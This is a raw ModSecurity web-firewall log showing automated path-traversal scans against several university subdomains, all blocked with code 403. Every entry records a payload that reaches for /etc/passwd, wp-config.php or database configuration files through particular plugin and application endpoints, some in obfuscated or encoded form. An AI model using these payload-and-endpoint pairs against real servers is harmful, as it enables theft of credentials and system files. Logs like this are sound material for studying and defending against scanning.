[Tue Aug 29 11:38:56.357283 2023] [:error] [pid 1576] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file_name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:file_name: ../../../../../Windows/debug/NetSetup.log"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/gespage/doDownloadData"] [unique_id "ZO12YMCo-f0AAAYo0yUAAAAZ"]
[Tue Aug 29 11:38:56.373524 2023] [:error] [pid 1564] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file_name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:file_name: ../../../../../Windows/debug/NetSetup.log"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/gespage/doDownloadData"] [unique_id "ZO12YMCo-f0AAAYcunMAAAAN"]
[Tue Aug 29 11:38:56.383670 2023] [:error] [pid 1574] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file_name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:file_name: ../../../../../Windows/debug/NetSetup.log"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/gespage/doDownloadData"] [unique_id "ZO12YMCo-f0AAAYmldgAAAAQ"]
[Tue Aug 29 11:38:56.460374 2023] [:error] [pid 1564] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file_name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:file_name: ../../../../../Windows/debug/NetSetup.log"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/gespage/doDownloadData"] [unique_id "ZO12YMCo-f0AAAYcunYAAAAN"]
[Tue Aug 29 11:38:56.462097 2023] [:error] [pid 1544] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file_name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:file_name: ../../../../../Windows/debug/NetSetup.log"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/gespage/doDownloadData"] [unique_id "ZO12YMCo-f0AAAYIYk4AAAAM"]
[Tue Aug 29 11:38:56.552206 2023] [:error] [pid 1544] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:file: ../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/wp-content/plugins/aspose-cloud-ebook-generator/aspose_posts_exporter_download.php"] [unique_id "ZO12YMCo-f0AAAYIYk8AAAAM"]
[Tue Aug 29 11:38:57.359459 2023] [:error] [pid 1566] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:filename: ../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/view/action/download_file.php"] [unique_id "ZO12YcCo-f0AAAYelWQAAAAV"]
[Tue Aug 29 11:38:57.359485 2023] [:error] [pid 1493] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:filename: ../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/view/action/download_file.php"] [unique_id "ZO12YcCo-f0AAAXVyvMAAAAB"]
[Tue Aug 29 11:38:57.365812 2023] [:error] [pid 1397] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:dir. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /.....///...../// found within ARGS:dir: http/.....///.....///config/config_db.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/include/thumb.php"] [unique_id "ZO12YcCo-f0AAAV1EewAAAAd"]
[Tue Aug 29 11:38:57.366059 2023] [:error] [pid 1574] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:file: ../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/wp-content/plugins/aspose-importer-exporter/aspose_import_export_download"] [unique_id "ZO12YcCo-f0AAAYmldoAAAAQ"]
[Tue Aug 29 11:38:57.370759 2023] [:error] [pid 1558] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:filename: ../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/view/action/download_file.php"] [unique_id "ZO12YcCo-f0AAAYWXY4AAAAF"]
[Tue Aug 29 11:38:57.376603 2023] [:error] [pid 1569] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:dir. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /.....///...../// found within ARGS:dir: http/.....///.....///config/config_db.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/include/thumb.php"] [unique_id "ZO12YcCo-f0AAAYh9Q8AAAAK"]
[Tue Aug 29 11:38:57.381607 2023] [:error] [pid 1496] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:dir. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /.....///...../// found within ARGS:dir: http/.....///.....///config/config_db.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/include/thumb.php"] [unique_id "ZO12YcCo-f0AAAXYiOcAAAAG"]
[Tue Aug 29 11:38:57.384559 2023] [:error] [pid 1499] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:filename: ../../ierp/bin/prop.xml"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/NCFindWeb"] [unique_id "ZO12YcCo-f0AAAXbb9cAAAAL"]
[Tue Aug 29 11:38:57.384984 2023] [:error] [pid 1122] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:dir. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /.....///...../// found within ARGS:dir: http/.....///.....///config/config_db.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/include/thumb.php"] [unique_id "ZO12YcCo-f0AAARiD2EAAAAJ"]
[Tue Aug 29 11:38:57.400956 2023] [:error] [pid 1481] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:filename: ../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/view/action/download_file.php"] [unique_id "ZO12YcCo-f0AAAXJ6ioAAAAX"]
[Tue Aug 29 11:38:57.404568 2023] [:error] [pid 1499] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:filename: ../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/view/action/download_file.php"] [unique_id "ZO12YcCo-f0AAAXbb9gAAAAL"]
[Tue Aug 29 11:38:57.405606 2023] [:error] [pid 1521] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:dir. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /.....///...../// found within ARGS:dir: http/.....///.....///config/config_db.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/include/thumb.php"] [unique_id "ZO12YcCo-f0AAAXxYTIAAAAh"]
[Tue Aug 29 11:39:05.032703 2023] [:error] [pid 1558] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:dir. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ...../// found within ARGS:dir: .....///http/.....///config/config_db.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/include/thumb.php"] [unique_id "ZO12acCo-f0AAAYWXasAAAAF"]
[Tue Aug 29 11:39:05.718907 2023] [:error] [pid 1499] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:dir. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ...../// found within ARGS:dir: .....///http/.....///config/config_db.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/include/thumb.php"] [unique_id "ZO12acCo-f0AAAXbb@4AAAAL"]
[Tue Aug 29 11:39:05.985159 2023] [:error] [pid 1677] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file_name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:file_name: ../../../../../Windows/debug/NetSetup.log"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/gespage/doDownloadData"] [unique_id "ZO12acCo-f0AAAaNDuoAAAAQ"]
[Tue Aug 29 11:39:06.025353 2023] [:error] [pid 1677] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:filename: ../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/view/action/download_file.php"] [unique_id "ZO12asCo-f0AAAaNDuwAAAAQ"]
[Tue Aug 29 11:39:06.536037 2023] [:error] [pid 1564] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:dir. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ...../// found within ARGS:dir: .....///http/.....///config/config_db.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/include/thumb.php"] [unique_id "ZO12asCo-f0AAAYcupkAAAAN"]
[Tue Aug 29 11:39:06.666875 2023] [:error] [pid 1520] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:dir. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ...../// found within ARGS:dir: .....///http/.....///config/config_db.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/include/thumb.php"] [unique_id "ZO12asCo-f0AAAXwLNoAAAAe"]
[Tue Aug 29 11:39:06.668250 2023] [:error] [pid 1564] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:dir. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ...../// found within ARGS:dir: .....///http/.....///config/config_db.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/include/thumb.php"] [unique_id "ZO12asCo-f0AAAYcup8AAAAN"]
[Tue Aug 29 11:39:07.052257 2023] [:error] [pid 1683] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:mdocs-img-preview. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:mdocs-img-preview: ../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/mdocs-posts/"] [unique_id "ZO12a8Co-f0AAAaT-uIAAAAb"]
[Tue Aug 29 11:39:07.068673 2023] [:error] [pid 1558] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:mdocs-img-preview. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:mdocs-img-preview: ../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/mdocs-posts/"] [unique_id "ZO12a8Co-f0AAAYWXbMAAAAF"]
[Tue Aug 29 11:39:07.291102 2023] [:error] [pid 1690] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:mdocs-img-preview. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:mdocs-img-preview: ../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/mdocs-posts/"] [unique_id "ZO12a8Co-f0AAAaa-RQAAAAp"]
[Tue Aug 29 11:39:07.298754 2023] [:error] [pid 1558] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:mdocs-img-preview. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:mdocs-img-preview: ../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/mdocs-posts/"] [unique_id "ZO12a8Co-f0AAAYWXbgAAAAF"]
[Tue Aug 29 11:39:07.317043 2023] [:error] [pid 1569] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:mdocs-img-preview. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:mdocs-img-preview: ../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/mdocs-posts/"] [unique_id "ZO12a8Co-f0AAAYh9TQAAAAK"]
[Tue Aug 29 11:39:10.480121 2023] [:error] [pid 1520] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:dir. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x5c\\x5c..\\x5c\\x5c..\\x5c\\x5c found within ARGS:dir: http\\x5c\\x5c..\\x5c\\x5c..\\x5c\\x5cconfig\\x5c\\x5cconfig_db.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/include/thumb.php"] [unique_id "ZO12bsCo-f0AAAXwLPEAAAAe"]
[Tue Aug 29 11:39:11.627588 2023] [:error] [pid 1520] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:dir. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x5c\\x5c..\\x5c\\x5c..\\x5c\\x5c found within ARGS:dir: http\\x5c\\x5c..\\x5c\\x5c..\\x5c\\x5cconfig\\x5c\\x5cconfig_db.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/include/thumb.php"] [unique_id "ZO12b8Co-f0AAAXwLPYAAAAe"]
[Tue Aug 29 11:39:11.736836 2023] [:error] [pid 1499] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:file: ../../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/cherry-plugin/admin/import-export/download-content.php"] [unique_id "ZO12b8Co-f0AAAXbcAIAAAAL"]
[Tue Aug 29 11:39:11.956327 2023] [:error] [pid 1499] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:urlConfig. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:urlConfig: ../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/alerts/alertConfigField.php"] [unique_id "ZO12b8Co-f0AAAXbcA0AAAAL"]
[Tue Aug 29 11:39:11.995256 2023] [:error] [pid 1564] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:urlConfig. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:urlConfig: ../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/alerts/alertConfigField.php"] [unique_id "ZO12b8Co-f0AAAYcursAAAAN"]
[Tue Aug 29 11:39:12.020567 2023] [:error] [pid 1696] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:urlConfig. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:urlConfig: ../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/alerts/alertConfigField.php"] [unique_id "ZO12cMCo-f0AAAagEwgAAAAn"]
[Tue Aug 29 11:39:12.035793 2023] [:error] [pid 1564] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:file: ../../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-content/plugins/cherry-plugin/admin/import-export/download-content.php"] [unique_id "ZO12cMCo-f0AAAYcur0AAAAN"]
[Tue Aug 29 11:39:12.225405 2023] [:error] [pid 1696] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:dir. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x5c\\x5c..\\x5c\\x5c..\\x5c\\x5c found within ARGS:dir: http\\x5c\\x5c..\\x5c\\x5c..\\x5c\\x5cconfig\\x5c\\x5cconfig_db.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/include/thumb.php"] [unique_id "ZO12cMCo-f0AAAagExIAAAAn"]
[Tue Aug 29 11:39:12.264858 2023] [:error] [pid 1696] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:urlConfig. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:urlConfig: ../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/alerts/alertConfigField.php"] [unique_id "ZO12cMCo-f0AAAagExQAAAAn"]
[Tue Aug 29 11:39:12.434938 2023] [:error] [pid 1673] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:file: ../../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/wp-content/plugins/cherry-plugin/admin/import-export/download-content.php"] [unique_id "ZO12cMCo-f0AAAaJJr0AAAAJ"]
[Tue Aug 29 11:39:12.435589 2023] [:error] [pid 1573] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:dir. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x5c\\x5c..\\x5c\\x5c..\\x5c\\x5c found within ARGS:dir: http\\x5c\\x5c..\\x5c\\x5c..\\x5c\\x5cconfig\\x5c\\x5cconfig_db.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/include/thumb.php"] [unique_id "ZO12cMCo-f0AAAYlCOAAAAAP"]
[Tue Aug 29 11:39:12.455992 2023] [:error] [pid 1673] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:file: ../../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/wp-content/plugins/cherry-plugin/admin/import-export/download-content.php"] [unique_id "ZO12cMCo-f0AAAaJJr4AAAAJ"]
